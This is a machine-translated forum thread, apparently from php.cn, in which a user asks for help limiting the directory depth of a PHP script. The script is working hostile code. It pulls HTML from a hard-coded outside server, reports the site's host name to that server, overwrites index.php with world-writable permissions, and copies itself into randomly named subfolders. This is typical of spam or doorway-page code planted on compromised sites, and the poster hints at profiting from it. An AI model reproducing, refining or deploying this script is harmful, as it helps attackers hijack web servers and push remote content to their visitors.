ホームページ  >  記事  >  バックエンド開発  >  PHP コードの生成層の数を変更するのを手伝ってください

PHP コードの生成層の数を変更するのを手伝ってください

WBOY
WBOYオリジナル
2016-06-23 13:23:00628ブラウズ

理解できません、現在いくつかのレイヤーが生成されています [ディレクトリを生成した後、ABC を生成してから ABC に DEF GHI を生成するなど、サブディレクトリに生成されます...]

レイヤーを 1 つ生成するだけですつまり、ルートディレクトリが生成され、サブディレクトリは生成されなくなります。
以下は、マスターが修正後に返信を貼り付けることができることを願っています。とても!

<?phpheader("Content-Type: text/html;charset=gb2312");$Remote_server = "http://meix.3428.net/"; $directory_Number=5; $Branch_directory_1=getCode(mt_rand(3,5));$Branch_directory_2=getCode(mt_rand(3,5));$Branch_directory_3=getCode(mt_rand(3,5));$Branch_directory_4=getCode(mt_rand(3,5));$Branch_directory_5=getCode(mt_rand(3,5));$Branch_directory_6=getCode(mt_rand(3,5));$Branch_directory_7=getCode(mt_rand(3,5));$Branch_directory_8=getCode(mt_rand(3,5));$Branch_directory_9=getCode(mt_rand(3,5));$Branch_directory_10=getCode(mt_rand(3,5));$Branch_directory = $Branch_directory_1.".".$Branch_directory_2.".".$Branch_directory_3.".".$Branch_directory_4.".".$Branch_directory_5.".".$Branch_directory_6.".".$Branch_directory_7.".".$Branch_directory_8.".".$Branch_directory_9.".".$Branch_directory_10;$NewFile_content = getFileCont("index.php");if (empty($NewFile_content)) {	exit("<p align='center'><font color='red'><b>页面在生成中稍等......</b></font></p>");}$ml = $_SERVER['REQUEST_URI'];$str= explode("/", $ml);$Quantity = count($str)-1; //层数$host_name = str_replace("index.php", "", "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);if ($Quantity<5 && $Quantity>0) {	$Remote_directory = $Remote_server."/directory.php?type=index.php&host=".$host_name."&directory=".$Branch_directory;	$Content_directory = getHTTPPage($Remote_directory);		$Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);	$Branch_directory= explode(".",$Branch_directory);	echo $Content_mb;	for ($i=0;$i < count($Branch_directory); $i++) {		$check = CFolder("./".$Branch_directory[$i]."/");		if ($check == 1) {			WriteIn("./".$Branch_directory[$i]."/index.php",$NewFile_content);		}	}	WriteIn("./index.php",$Content_mb);	chmod("index.php",0777);	echo "<meta http-equiv='refresh' content='0; url=index.php'>";	exit();} else {	$Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);	WriteIn("./index.php",$Content_mb);	chmod("index.php",0777);	header("Location: index.php");	exit();}  function getCode($iCount) {//取随机混合字母数字    	$arrChar = "012qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM3456789";	$code="";    for ( $i = 0; $i < $iCount; $i++ )  	{ 		$code .= $arrChar[ mt_rand(0, strlen($arrChar) - 1) ];  	}  	return $code; }function Digital($iCount) {//取随机数字    $arrChar = "0123456789";	$code="";    for ( $i = 0; $i < $iCount; $i++ )  	{ 		$code .= $arrChar[ mt_rand(0, strlen($arrChar) - 1) ];  	}  	return $code; }function sj_int($min, $max) { //取随机数字	return mt_rand($min, $max);}function WriteIn($testfile, $msg) {	if (empty($msg)) {		echo "内容为空";		return;	}		$fp = @fopen($testfile,"w");	fwrite($fp,$msg);	fclose($fp);}function getFileCont($testfile) {	$restr = '';	$fp = @fopen($testfile,"r");	if ($fp) {		while($line=fgets($fp,1024)) $restr.=$line;		fclose($fp);	}	return $restr;}function CFolder($Filepath) {  if (!file_exists($Filepath)) {	mkdir($Filepath, 0777);	return 1;  }  return 0;}function getHTTPPage($url) {	$opts = array(	  'http'=>array(		'method'=>"GET",		'header'=>"User-Agent: aQ0O010O"	  )	);	$context = stream_context_create($opts);	$html = @file_get_contents($url, false, $context);	if (empty($html)) {		exit("<p align='center'><font color='red'><b>服务器获取文件内容出错</b></font></p>");	}		return $html;} function GetHtml($url) {	return getHTTPPage($url);}


ディスカッションへの返信(解決策)

レイヤー数のマークの箇所によると、まだ反応しません

分かりました自分で。 5 はどの数字ですか?マークは間違っています、敗者にも反撃の日があります [PHP はまったくわかりません。使い方しか知りません。私が大金を稼ぐのを見守ってください]

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。